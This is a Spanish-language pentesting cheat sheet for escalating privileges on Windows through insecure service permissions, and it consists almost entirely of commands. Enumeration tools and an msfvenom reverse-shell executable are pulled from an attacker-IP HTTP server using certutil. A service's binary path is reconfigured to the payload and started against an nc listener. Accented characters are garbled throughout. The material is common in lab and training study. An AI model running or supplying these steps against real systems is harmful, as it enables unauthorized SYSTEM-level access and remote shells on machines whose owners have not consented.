Permisos de servicio inseguros
Enumeraci贸n
# Transferencia de WinPEAS
## M谩quina atacante
md5sum winpeas.exe; python3 -m http.server 80
## M谩quina victima
certutil.exe -urlcache -f http://<attacker-IP-address>:80/winpeas.exe winpeas.exe & certutil.exe -hashfile winpeas.exe MD5
# Transferencia de AccessChk
## M谩quina atacante
md5sum accesschk.exe; python3 -m http.server 80
## M谩quina victima
certutil.exe -urlcache -f http://<attacker-IP-address>:80/accesschk.exe accesschk.exe & certutil.exe -hashfile accesschk.exe MD5
# Enumeraci贸n de servicios con WinPEAS
.\winpeas.exe quiet servicesinfo
# Enumeraci贸n de privilegios del servicio con AccessChk (SERVICE_CHANGE_CONFIG)
.\accesschk.exe /accepteula -uwcqv user <service-name>
# Revisi贸n de privilegios de ejecuci贸n del servicio (SERVICE_START_NAME)
## SERVICE_START_NAME: LocalSystem
sc qc <service-name>Escalamiento de privilegios
# Generaci贸n y transferencia de reverse shell
## M谩quina atacante
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker-IP-address> LPORT=443 -f exe -o reverse.exe
md5sum reverse.exe; python3 -m http.server 80
## M谩quina victima
certutil.exe -urlcache -f http://<attacker-IP-address>:80/reverse.exe reverse.exe & certutil.exe -hashfile reverse.exe MD5
# Modificaci贸n de configuraci贸n del servicio (BINARY_PATH_NAME)
sc config daclsvc binpath= "\"C:\<path>\reverse.exe\""
# Configuraci贸n de listener de reverse shell en m谩quina atacante
rlwrap nc -lvnp 443
# Inicio del servicio
net start <service-name>脷ltima actualizaci贸n